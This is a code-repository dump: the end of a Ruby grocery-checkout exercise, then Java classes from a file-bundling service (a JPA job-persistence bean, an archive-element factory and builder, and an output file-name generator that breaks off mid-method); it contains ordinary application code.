coupon_obj[:num] end end i+= 1 end cart end def apply_clearance(cart) i = 0 while i < cart.length do obj = cart[i] item_clearance = obj[:clearance] item_price = obj[:price] discount_price = item_price - (0.20 * item_price) if item_clearance == true obj[:price] = discount_price.round(2) end i+=1 end return cart end def checkout(cart, coupons) consolidated_cart = consolidate_cart(cart) couponed_cart = apply_coupons(consolidated_cart, coupons) clearance_cart = apply_clearance(couponed_cart) total = 0 i = 0 while i < clearance_cart.length do item_in_cart = clearance_cart[i] price_of_item = item_in_cart[:price] * item_in_cart[:count] total += price_of_item i+=1 end if total > 100 total = total - (0.10 * total) end return total end
f65739aa36bb8a4f451c2f6c4b80d56b9c97fe97
[ "Ruby" ]
1
Ruby
saimaar/programming-univbasics-nds-green-grocer-dumbo-web-111819
96de6769fc1966eacde0d070635fd084e052b6da
af66c8147fe7afc4012b5d054455c542dbc52cc8
refs/heads/master
<repo_name>carpenlc/EnterpriseBundler<file_sep>/parent/BundlerEJB/src/main/java/mil/nga/bundler/ejb/JobService.java package mil.nga.bundler.ejb; import java.util.ArrayList; import java.util.List; import javax.ejb.LocalBean; import javax.ejb.Stateless; import javax.persistence.EntityManager; import javax.persistence.EntityManagerFactory; import javax.persistence.NoResultException; import javax.persistence.Persistence; import javax.persistence.PersistenceContext; import javax.persistence.Query; import javax.persistence.TypedQuery; import javax.persistence.criteria.CriteriaBuilder; import javax.persistence.criteria.CriteriaQuery; import javax.persistence.criteria.Path; import javax.persistence.criteria.Root; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.exceptions.ServiceUnavailableException; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.model.Job; import mil.nga.bundler.types.JobStateType; /** * Session Bean implementation class JobService * */ @Stateless @LocalBean public class JobService implements BundlerConstantsI { /** * Set up the Log4j system for use throughout the class */ private static final Logger LOGGER = LoggerFactory.getLogger( JobService.class); /** * JPA persistence entity manager. */ @PersistenceContext(unitName=APPLICATION_PERSISTENCE_CONTEXT) private EntityManager em; /** * Default Eclipse-generated constructor. */ public JobService() { } /** * Accessor method for the EntityManager object that will be used to * interact with the backing data store. * * @return A constructed EntityManager object. */ private EntityManager getEntityManager() throws ServiceUnavailableException { if (em == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Container-injected EntityManager is null. " + "Creating un-managed EntityManager."); } EntityManagerFactory emFactory = Persistence.createEntityManagerFactory( APPLICATION_PERSISTENCE_CONTEXT); if (emFactory != null) { em = emFactory.createEntityManager(); } else { LOGGER.warn("Unable to create un-managed EntityManager object."); } if (em == null) { throw new ServiceUnavailableException( "Unable to start the JPA subsystem. The injected " + "EntityManager object is null."); } } return em; } /** * Get a list of Jobs that have not yet completed. * * @return A list of jobs in a state other than "COMPLETE". */ public List<Job> getIncompleteJobs() throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<Job> jobs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> rootEntry = cq.from(Job.class); CriteriaQuery<Job> all = cq.select(rootEntry); cq.where(cb.notEqual(rootEntry.get("state"), JobStateType.COMPLETE)); cq.orderBy(cb.desc(rootEntry.get("startTime"))); TypedQuery<Job> allQuery = getEntityManager().createQuery(all); jobs = allQuery.getResultList(); } catch (NoResultException nre) { LOGGER.info("javax.persistence.NoResultException " + "encountered. Error message [ " + nre.getMessage() + " ]. Returned List<Job> object will be null."); jobs = new ArrayList<Job>(); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Incomplete job list retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobs; } /** * Retrieve a Job object from the target database. * * @param jobID The job ID (primary key) of the job to retrieve. * @return The target Job object. Null if the Job could not be found. */ public Job getJob(String jobID) throws ServiceUnavailableException { long start = System.currentTimeMillis(); Job job = null; if ((jobID != null) && (!jobID.isEmpty())) { try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> root = cq.from(Job.class); // Add the "where" clause cq.where( cb.equal( root.get("jobID"), cb.parameter(String.class, "jobID"))); // Create the query Query query = getEntityManager().createQuery(cq); // Set the value for the where clause query.setParameter("jobID", jobID); // Retrieve the data job = (Job)query.getSingleResult(); } catch (NoResultException nre) { LOGGER.warn("Unable to find Job associated with job ID [ " + jobID + " ]. Returned Job will be null."); } } else { LOGGER.warn("The input job ID is null or empty. Unable to " + "retrieve an associated job."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job [ " + jobID + " ] retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return job; } /** * Get a list of all jobIDs currently residing in the target data store. * * @return A list of jobIDs */ @SuppressWarnings("unchecked") public List<String> getJobIDs() throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<String> jobIDs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> e = cq.from(Job.class); cq.multiselect(e.get("jobID")); Query query = getEntityManager().createQuery(cq); jobIDs = query.getResultList(); } catch (NoResultException nre) { LOGGER.warn("Unable to find any job IDs in the data store. " + "Returned list will be empty."); jobIDs = new ArrayList<String>(); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job IDs retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobIDs; } /** * Return a list of all Job objects in the target data store. * @return All existing Job objects. */ public List<Job> getJobs() throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<Job> jobs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> root = cq.from(Job.class); // Add the "order by" clause sorting by time cq.orderBy(cb.desc(root.get("startTime"))); // Create the query TypedQuery<Job> query = getEntityManager().createQuery(cq); // Retrieve the data jobs = query.getResultList(); } catch (NoResultException nre) { LOGGER.warn("javax.persistence.NoResultException " + "encountered. Error message [ " + nre.getMessage() + " ]."); jobs = new ArrayList<Job>(); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job list retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobs; } /** * This method will retrieve Job objects from the database that * have a start_time (startTime) that fall between the input startTime and * endTime parameters. The time data stored in the database are not dates, * but long values. As such, the two time parameters should be formatted as * long time values (i.e. milliseconds from epoch). * * @param startTime Earliest time in the time slice to query. * @param endTime Latest time in the time slice to query. * @return A list of jobs in with a start time that fall between the two * input dates. */ public List<Job> getJobsByDate( long startTime, long endTime) throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<Job> jobs = null; // Ensure the startTime is earlier than the endTime before submitting // the query to the database. if (startTime > endTime) { LOGGER.warn("The caller supplied a start time that falls " + "after the end time. Swapping start and end " + "times."); long temp = startTime; startTime = endTime; endTime = temp; } else if (startTime == endTime) { LOGGER.warn("The caller supplied the same time for both start " + "and end time. This method will likely yield a null " + "job list."); } try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> rootEntry = cq.from(Job.class); CriteriaQuery<Job> all = cq.select(rootEntry); Path<Long> pathToStartTime = rootEntry.get("startTime"); cq.where(cb.between(pathToStartTime, startTime, endTime)); cq.orderBy(cb.desc(pathToStartTime)); TypedQuery<Job> allQuery = getEntityManager().createQuery(all); jobs = allQuery.getResultList(); } catch (NoResultException nre) { LOGGER.warn("javax.persistence.NoResultException " + "encountered. Error message [ " + nre.getMessage() + " ]."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job list retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobs; } /** * Update the data in the back end database with the current contents * of the Job. * * @param job The Job object to update. * @return The container managed Job object. */ public Job update(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); Job managedJob = null; if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning update of job [ " + job.getJobID() + " ]..."); } // getEntityManager().getTransaction().begin(); managedJob = getEntityManager().merge(job); getEntityManager().flush(); // getEntityManager().getTransaction().commit(); } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job updated in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return managedJob; } /** * Persist the input Job object into the back-end data store. * * @param job The Job object to persist. */ public void persist(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning persistence of job [ " + job.getJobID() + " ]..."); } // getEntityManager().getTransaction().begin(); getEntityManager().persist(job); getEntityManager().flush(); // getEntityManager().getTransaction().commit(); } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job persisted in [ " + (System.currentTimeMillis() - start) + " ] ms."); } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/ArchiveElementFactory.java package mil.nga.bundler; import java.io.FileNotFoundException; import java.io.IOException; import java.net.URI; import java.nio.file.FileSystemNotFoundException; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import java.util.Properties; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.messages.FileRequest; import mil.nga.bundler.model.ArchiveElement; import mil.nga.util.FileFinder; import mil.nga.util.URIUtils; /** * The bundler interface (<code>BundlerI</code>) has a single method that * accepts a list of <code>ArchiveElement</code> objects and an output * file name. This class was implemented to convert user-supplied lists * of files to the require list of ArchiveElement objects. * * @author <NAME> */ public class ArchiveElementFactory { /** * Set up the Log4j system for use throughout the class */ final static Logger LOGGER = LoggerFactory.getLogger( ArchiveElementFactory.class); /** * Constructor used to ensure the required file system drivers * are loaded. */ public ArchiveElementFactory() { FileSystemFactory.getInstance().loadS3Filesystem(); FileSystemFactory.getInstance().listFileSystemsAvailable(); } /** * Alternate constructor added to support jUnit tests. * @param props The input Properties object should contain the * AWS configuration data. */ public ArchiveElementFactory(Properties props) { FileSystemFactory.getInstance(props).loadS3Filesystem(); FileSystemFactory.getInstance(props).listFileSystemsAvailable(); } /** * Create a full URI based on an input String-based file path. * * @param filePath Path to a target file. * @return Associated URI to the same target file. * @throws FileNotFoundException Thrown if the target file does not exist. * @throws FileSystemNotFoundException Thrown if the input URI resides on * a file system that is not available. */ public URI getURI(String filePath) throws FileNotFoundException, FileSystemNotFoundException { URI uri = null; if ((filePath != null) && (!filePath.isEmpty())) { uri = URIUtils.getInstance().getURI(filePath); LOGGER.info("String: " + filePath); LOGGER.info("URI: " + uri.toString()); if (!Files.exists(Paths.get(uri))) { throw new FileNotFoundException("Target file does not exist [ " + uri.toString() + " ]."); } } else { LOGGER.warn("Input filePath is null or not defined. Returned " + "URI will be null."); } return uri; } /** * Calculate the archive entry path for the given input String-based path. * It turns out that calculating the entry path is fairly complicated. As * such it has been off-loaded to a separate class. * * @param filePath String-based path to the target file. * @return The entry path that will be used to archive the product. */ private String getEntryPath(URI uri) { return EntryPathFactory.getInstance() .getEntryPath(uri); } /** * Calculate the archive entry path for the given input String-based path. * It turns out that calculating the entry path is fairly complicated. As * such it has been off-loaded to a separate class. This method signature * replaces the entire file path with the input user-specified path. * * @param filePath String-based path to the target file. * @return The entry path that will be used to archive the product. */ private String getEntryPath(URI uri, String replacementPath) { return EntryPathFactory.getInstance() .getEntryPath(uri, replacementPath); } /** * Calculate the archive entry path for the given input String-based path. * It turns out that calculating the entry path is fairly complicated. As * such it has been off-loaded to a separate class. * * @param uri The fill URI to the target file. * @param baseDir The base directory path. * @param archivePath User-specified string that will be pre-pended to the * entry path. * @return The entry path that will be used to archive the product. */ private String getEntryPath( URI uri, String baseDir, String archivePath) { return EntryPathFactory .getInstance() .getEntryPath(uri, baseDir, archivePath); } /** * Generate a single ArchiveElement object from an input file that was * derived from a directory traversal. * * @param file The target file for bundling. * @param baseDir The parent base-directory. * @param replacementPath Path that will be used to replace the target * base directory. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement( String file, String baseDir, String replacementPath) { ArchiveElement element = null; if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath( getEntryPath( uri, baseDir, replacementPath)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + file + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + file + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Generate a single ArchiveElement object from an input file that was * derived from a directory traversal. * * @param file The target file for bundling. * @param baseDir The parent base-directory. * @param replacementPath Path that will be used to replace the target * base directory. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement( URI uri, String baseDir, String replacementPath) { ArchiveElement element = null; if (uri != null) { try { element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath( getEntryPath( uri, baseDir, replacementPath)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + uri.toString() + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + uri.toString() + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Generate a single ArchiveElement object from an input file. * * @param file The target file for bundling. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement(String file) { ArchiveElement element = null; if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath(getEntryPath(uri)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + file + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + file + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Generate a single ArchiveElement object from an input file that was * derived from a directory traversal. * * @param file The target file for bundling. * @param baseDir The parent base-directory. * @param replacementPath Path that will be used to replace the target * base directory. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement( String file, String replacementPath) { ArchiveElement element = null; if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath( getEntryPath( uri, replacementPath)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + file + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + file + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Convert a list of String path names into a List of ArchiveElement POJOs * for submission to the bundler code. This method signature was introduced * to handle file lists that resulted from flattening of a user-supplied * directory. * * @param files An input list of Strings representing the full path to a * target file for archive/compression. * @param replacementPath User-specified string that will be pre-pended to the * entry path. May be null or empty. * @return A list of ArchiveElement objects for submission to the bundler * methods. The returned list may be empty, but will not be null. */ public List<ArchiveElement> getArchiveElements( List<String> files, String baseDir, String replacementPath) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (String file : files) { try { ArchiveElement elem = getArchiveElement( file, baseDir, replacementPath); if (elem != null) { elements.add(elem); } else { LOGGER.warn("Unable to generate an ArchiveElement " + "object for file [ " + file + " ]."); } } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileSystemNotFoundException fsnfe) { LOGGER.warn("System error. No file system provider " + "available for the input URI scheme. Exception " + "message => [ " + fsnfe.getMessage() + " ]."); } } } return elements; } /** * Convert a list of String path names into a List of ArchiveElement POJOs * for submission to the bundler code. This method signature was introduced * to handle file lists that resulted from flattening of a user-supplied * directory. * * @param files An input list of Strings representing the full path to a * target file for archive/compression. * @param replacementPath User-specified string that will be pre-pended to the * entry path. May be null or empty. * @return A list of ArchiveElement objects for submission to the bundler * methods. The returned list may be empty, but will not be null. */ public List<ArchiveElement> getURIArchiveElements( List<URI> files, String baseDir, String replacementPath) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (URI file : files) { try { ArchiveElement elem = getArchiveElement( file, baseDir, replacementPath); if (elem != null) { elements.add(elem); } else { LOGGER.warn("Unable to generate an ArchiveElement " + "object for file [ " + file + " ]."); } } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileSystemNotFoundException fsnfe) { LOGGER.warn("System error. No file system provider " + "available for the input URI scheme. Exception " + "message => [ " + fsnfe.getMessage() + " ]."); } } } return elements; } /** * Convert a list of String path names into a List of ArchiveElement POJOs * for submission to the bundler code. * * @param files An input list of Strings representing the full path to a * target file for archive/compression. * @return A list of ArchiveElement objects for submission to the bundler * methods. The returned list may be empty, but will not be null. */ public List<ArchiveElement> getArchiveElements(List<String> files) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (String file : files) { try { ArchiveElement elem = getArchiveElement(file); if (elem != null) { elements.add(elem); } else { LOGGER.warn("Unable to generate an ArchiveElement " + "object for file [ " + file + " ]."); } } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileSystemNotFoundException fsnfe) { LOGGER.warn("System error. No file system provider " + "available for the input URI scheme. Exception " + "message => [ " + fsnfe.getMessage() + " ]."); } } } return elements; } /** * Method generates a list of files that fall below the input URI. It is * intended that the input URI will identify a directory. If the input * URI is a regular file, that URI will be returned. * * @param uri URI of a directory. * @return List of files that fall below the input directory. The return * may be empty, but will not be null. */ private List<URI> getFileList(URI uri) { List<URI> files = new ArrayList<URI>(); if (uri != null) { try { List<URI> uris = FileFinder.listFiles(uri); if ((uris != null) && (uris.size() > 0)) { for (URI element : uris) { if (!Files.isDirectory(Paths.get(element))) { files.add(element); } } } } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while obtaining a " + "listing of URI [ " + uri.toString() + " ]. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("The input URI is null. An empty list will be returned."); } return files; } public List<ArchiveElement> getArchiveElements(FileRequest request) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if (request != null) { if ((request.getFile() != null) && (!request.getFile().isEmpty())) { try { URI uri = getURI(request.getFile()); Path p = Paths.get(uri); if (Files.isDirectory(p)) { elements.addAll( getURIArchiveElements( getFileList(uri), p.toString(), request.getArchivePath())); } else { if (request.getArchivePath() != null) { elements.add(getArchiveElement(request.getFile(), request.getArchivePath())); } else { elements.add(getArchiveElement(request.getFile())); } } } catch (FileNotFoundException fnfe) { LOGGER.warn("Target directory [ " + request.getFile() + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while attempting " + "to walk the file tree for directory [ " + request.getFile() + " ]. Exception message => [ " + ioe.getMessage()); } } } else { } return elements; } /** * This method signature accepts a single <code>String</code> filename * that represents a directory. The code then expands the contents of that * directory generating the associated list of files. * * @param file String-based file object. If it doesn't represent a * directory a list containing a single ArchiveElement object will be * returned. * @param replacementPath Client-supplied replacement path. If the * replacement path is an empty String, the output will be just the file * name. If the replacement Path is null, the usual rules for generating * an entry path will be followed. * @return List of ArchiveElement objects. */ public List<ArchiveElement> getArchiveElements( String file, String replacementPath) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); Path p = Paths.get(uri); if (Files.isDirectory(p)) { elements.addAll( getURIArchiveElements( getFileList(uri), p.toString(), replacementPath)); } else { if (replacementPath != null) { elements.add(getArchiveElement(file, replacementPath)); } else { elements.add(getArchiveElement(file)); } } } catch (FileNotFoundException fnfe) { LOGGER.warn("Target directory [ " + file + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while attempting " + "to walk the file tree for directory [ " + file + " ]. Exception message => [ " + ioe.getMessage()); } } return elements; } public static void main (String[] args) { List<String> fileList = new ArrayList<String>(); fileList.add("file:///tmp/test_file_1"); fileList.add("/tmp/test_file_2"); fileList.add("file:///mnt/fbga/CDRG/cdrgxgdneur50kc_1/covdata/ctlm50.cov"); // Must add s3fs filesystem for the following to work. fileList.add("s3fs:///tmp/test_file_3"); List<ArchiveElement> outputList = (new ArchiveElementFactory()).getArchiveElements(fileList); for (ArchiveElement element : outputList) { System.out.println(element.toString()); } List<String> flatFileList = new ArrayList<String>(); flatFileList.add("file:///tmp/test/test2/test_file_2"); flatFileList.add("file:///tmp/test/test2/test_file_1"); flatFileList.add("file:/tmp/test/test2/test_file_3"); flatFileList.add("file:/tmp/test/test2/test_file_4"); List<ArchiveElement> outputList2 = (new ArchiveElementFactory()).getArchiveElements(flatFileList, "/tmp/test", "/new_root"); for (ArchiveElement element : outputList2) { System.out.println(element.toString()); } String directory = "/tmp"; List<ArchiveElement> directoryListing = (new ArchiveElementFactory()).getArchiveElements(directory, "blah/blah"); for (ArchiveElement element : directoryListing) { System.out.println(element.toString()); } String test = "file:///tmp/test/test2/test_file_2"; List<ArchiveElement> singleFile = (new ArchiveElementFactory()).getArchiveElements(test, "blah/blah"); for (ArchiveElement element : singleFile) { System.out.println(element.toString()); } String testNoPathReplacement = "file:///tmp/test/test2/test_file_2"; List<ArchiveElement> singleFileNoPathReplacement = (new ArchiveElementFactory()).getArchiveElements(testNoPathReplacement, ""); for (ArchiveElement element : singleFileNoPathReplacement) { System.out.println(element.toString()); } String testNoPathReplacement2 = "file:///tmp/test/test2/test_file_2"; List<ArchiveElement> singleFileNoPathReplacement2 = (new ArchiveElementFactory()).getArchiveElements(testNoPathReplacement2, null); for (ArchiveElement element : singleFileNoPathReplacement2) { System.out.println(element.toString()); } try { URI uri = (new ArchiveElementFactory()).getURI("/tmp/test"); System.out.println("URI : " + uri.toString()); } catch (Exception e) { e.printStackTrace(); } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/model/ArchiveElement.java package mil.nga.bundler.model; import java.io.Serializable; import java.net.URI; /** * Simple data structure that is used to hold the data required to bundle * a single file. This class holds the target file URI, the associated * path within the output archive, and the size of the file. * * @author <NAME> */ public class ArchiveElement implements Serializable { /** * Eclipse-generated serialVersionUID */ private static final long serialVersionUID = -5375301883838782257L; /** * URI locating the target file for bundling. */ private final URI uri; /** * Path within the output archive where the target file will be placed. */ private final String entryPath; /** * The size of the target file. */ private final long size; /** * Constructor enforcing the Builder design pattern. * @param builder Builder class implementing type checking. */ public ArchiveElement (ArchiveElementBuilder builder) { uri = builder.uri; entryPath = builder.entryPath; size = builder.size; } /** * Getter method for the Universal Resource Identifier (URI) associated * with the target file. * @return The URI associated with the target file. */ public URI getURI() { return uri; } /** * Getter method for the path within the output archive in which the * target file will reside. * @return The entry path. */ public String getEntryPath() { return entryPath; } /** * Getter method for the size of the target file. * @return The size of the target file. */ public long getSize() { return size; } /** * Convert to a human-readable String for logging purposes. */ public String toString() { StringBuilder sb = new StringBuilder(); sb.append("Archive Entry => URI [ "); sb.append(getURI().toString()); sb.append(" ], Entry Path [ "); sb.append(getEntryPath()); sb.append(" ], size [ "); sb.append(getSize()); sb.append(" ]."); return sb.toString(); } /** * Class implementing the Builder creation pattern for new * ArchiveElement objects. * * @author <NAME> */ public static class ArchiveElementBuilder { private URI uri = null; private String entryPath = null; private long size = -1; /** * Method used to actually construct the BundlerJobMetrics object. * @return A constructed and validated BundlerJobMetrics object. */ public ArchiveElement build() throws IllegalStateException { ArchiveElement object = new ArchiveElement(this); validateArchiveElementObject(object); return object; } /** * Setter method for the URI of the target file to bundle. * * @param value The URI requested. * @return Reference to the parent builder object. */ public ArchiveElementBuilder uri(URI value) { uri = value; return this; } /** * Setter method for the path in the output archive in which the * target file will be placed. * * @param value The archive entry path. * @return Reference to the parent builder object. */ public ArchiveElementBuilder entryPath(String value) { entryPath = value; return this; } /** * Setter method for the size of the target file. * * @param value The size of the target file. * @return Reference to the parent builder object. */ public ArchiveElementBuilder size(long value) { size = value; return this; } /** * Validate that all required fields are populated. * * @param object The ArchiveElement object to validate. * @throws IllegalStateException Thrown if any of the required fields * are not populated. */ public void validateArchiveElementObject(ArchiveElement object) throws IllegalStateException { if (object.getURI() == null) { throw new IllegalStateException ("Invalid value for target " + "URI [ null ]."); } if ((object.getEntryPath() == null) || (object.getEntryPath().isEmpty())) { throw new IllegalStateException ("Invalid value for entry " + "path [ " + object.getEntryPath() + " ]."); } if (object.getSize() < 0) { throw new IllegalStateException ("Invalid value for file " + "size [ " + object.getSize() + " ]."); } } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/FileNameGenerator.java package mil.nga.bundler; import java.io.FileNotFoundException; import java.net.URI; import java.nio.file.FileSystemNotFoundException; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.PropertyLoader; import mil.nga.bundler.exceptions.PropertiesNotLoadedException; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.types.ArchiveType; import mil.nga.util.JobIDGenerator; import mil.nga.util.URIUtils; /** * Class used in the generation of output file names/URIs for individual * bundler jobs. * * @author <NAME> */ public class FileNameGenerator extends PropertyLoader implements BundlerConstantsI { /** * Set up the Log4j system for use throughout the class */ static final Logger LOGGER = LoggerFactory.getLogger( FileNameGenerator.class); /** * The job ID that will be used in the generation of output file names. */ private String jobID; /** * Staging area used for the output archives. */ private String stagingArea; /** * The template to use for the output filename. */ private String filenameTemplate; /** * Archive type that will be created. */ private ArchiveType type; /** * The file path separator */ private String pathSeparator = null; /** * Default constructor that sets the value for the staging area. If * the staging area is not read from the Properties file, the JVM * temporary directory is used. */ private FileNameGenerator() { super(PROPERTY_FILE_NAME); String stagingArea = null; pathSeparator = System.getProperty("file.separator"); try { stagingArea = getProperty(STAGING_DIRECTORY_PROPERTY); } catch (PropertiesNotLoadedException pnle) { LOGGER.warn("An unexpected PropertiesNotLoadedException " + "was encountered. Please ensure the application " + "is properly configured. Using value of [ " + "java.io.tmpdir" + " ] for staging area. Exception message => [ " + pnle.getMessage() + " ]."); } setStagingArea(stagingArea); } /** * Alternate constructor allowing clients to specify the ArchiveType on * construction. The other required parameters (job ID and file name) * will be default values. * * @param type The archive type. */ public FileNameGenerator(ArchiveType type) { this(); setArchiveType(type); setJobID(null); setTemplateName(null); } /** * Alternate constructor allowing clients to specify the ArchiveType and * job ID on construction. The other required parameters (file name) * will be default values. * * @param type The archive type. * @param jobID The job ID to utilize. */ public FileNameGenerator(ArchiveType type, String jobID) { this(); setArchiveType(type); setJobID(jobID); setTemplateName(null); } /** * Alternate constructor allowing clients to specify the ArchiveType, * job ID, and file name on construction. * * @param type The archive type. * @param jobID The job ID to utilize. * @param fileName The template to use when generating the output file name. */ public FileNameGenerator(ArchiveType type, String jobID, String fileName) { this(); setArchiveType(type); setJobID(jobID); setTemplateName(fileName); } /** * Public method used to return the name of the target output directory. * @return The output directory path. */ public URI getOutputDirectory() { StringBuilder sb = new StringBuilder(); sb.append(stagingArea); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } sb.append(jobID); return getURI(sb.toString()); } /** * Public method used to generate the URI of the target output file. * * @param ID The archive ID. * @return The URI of the output filename. */ public URI getOutputFile(int ID) { StringBuilder sb = new StringBuilder(); sb.append(stagingArea); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } if (!jobID.isEmpty()) { sb.append(jobID); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } } sb.append(filenameTemplate); if (ID > 0) { sb.append("_"); sb.append(ID); } sb.append("."); sb.append(type.getText().toLowerCase()); return getURI(sb.toString()); } /** * Get the default name of the archive file to use. * * @return The archive filename. */ public static String getFileName() { StringBuilder sb = new StringBuilder(); sb.append(DEFAULT_FILENAME_PREFIX); sb.append("_data_archive"); return sb.toString(); } /** * Create a full URI based on an input String-based file path. * * @param filePath Path to a target file. * @return Associated URI to the same target file. * @throws FileNotFoundException Thrown if the target file does not exist. * @throws FileSystemNotFoundException Thrown if the input URI resides on * a file system that is not available. */ private URI getURI(String filePath) throws FileSystemNotFoundException { URI uri = null; if ((filePath != null) && (!filePath.isEmpty())) { uri = URIUtils.getInstance().getURI(filePath); } else { LOGGER.warn("Input file path is null. Unable to create URI."); } return 